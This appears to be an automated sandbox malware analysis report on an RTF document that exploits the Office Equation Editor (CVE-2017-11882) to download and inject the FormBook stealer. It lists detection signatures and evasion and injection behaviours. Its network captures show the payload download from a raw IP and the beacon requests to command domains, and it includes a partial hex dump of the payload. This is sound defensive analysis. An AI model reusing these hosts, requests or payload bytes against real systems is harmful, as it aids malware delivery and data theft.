Analysis Report fqwBU8MyzT.rtf

Overview

General Information

Sample Name: fqwBU8MyzT.rtf
Analysis ID: 321301
MD5: b115f24fcecce5e8661300527a748448
SHA1: 9673703628a2edf4fea0b3a764357f82b4c9ce9f
SHA256: 15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
Tags: Formbookrtf

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: fqwBU8MyzT.rtf Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted file
Source: fqwBU8MyzT.rtf ReversingLabs: Detection: 48%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.auctionpros.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 19:04:32 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 19 Nov 2020 08:07:19 GMTETag: "ada00-5b471378e0ce7"Accept-Ranges: bytesContent-Length: 711168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 27 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ba 0a 00 00 1e 00 00 00 00 00 00 6e d9 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c d9 0a 00 4f 00 00 00 00 e0 0a 00 20 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 b9 0a 00 00 20 00 00 00 ba 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 1a 00 00 00 e0 0a 00 00 1c 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 d8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 d9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 50 e8 08 00 cc f0 01 00 03 00 00 00 02 00 00 06 c8 cd 01 00 88 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 1b 30 04 00 1f 00 00 00 01 00 00 11 00 00 28 1e 00 00 0a 28 05 00 00 06 00 de 02 00 dc 00 28 0b 00 00 06 02 28 06 00 00 06 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 16 28 1f 00 00 0a 20 b0 cb 8b 1b 20 39 39 48 0e 61 25 0a 1d 5e 45 07 00 00 00 d0 ff ff ff 41 00 00 00 12 00 00 00 74 00 00 00 02 00 00 00 5b 00 00 00 29 00 00 00 2b 72 00 06 20 6b 78 5c 52 5a 20 46 88 3c 91 61 2b c3 02 17 28 07 00 00 06 00 06 20 8d ca c1 ee 5a 20 4a a6 e5 72 61 2b ac 00 02 17 28 20 00 00 0a 00 06 20 79 ff 5a 07 5a 20 59 e0 ad 40 61 2b 94 02 16 28 21 00 00 0a 00 06 20 c0 ad 34 ae 5a 20 ab a0 33 85 61 38 7a ff ff ff 02 16 28 22 00 00 0a 06 20 e1 cb c2 91 5a 20 c8 13 e9 49 61 38 61 ff ff ff 2a 00 00 00 13 30 04 00 44 00 00 00 01 00 00 11 00 20 66 37 11 69 20 59 84 7e 07 61 25 0a 19 5e 45 03 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: unknown TCP traffic detected without corresponding DNS query: 103.207.38.170
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.auctionpros.club
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:06:00 GMTServer: ApacheAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/htmlConnection: closeData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: wlanext.exe, 00000009.00000002.2401705675.000000000294F000.00000004.00000001.sdmp String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
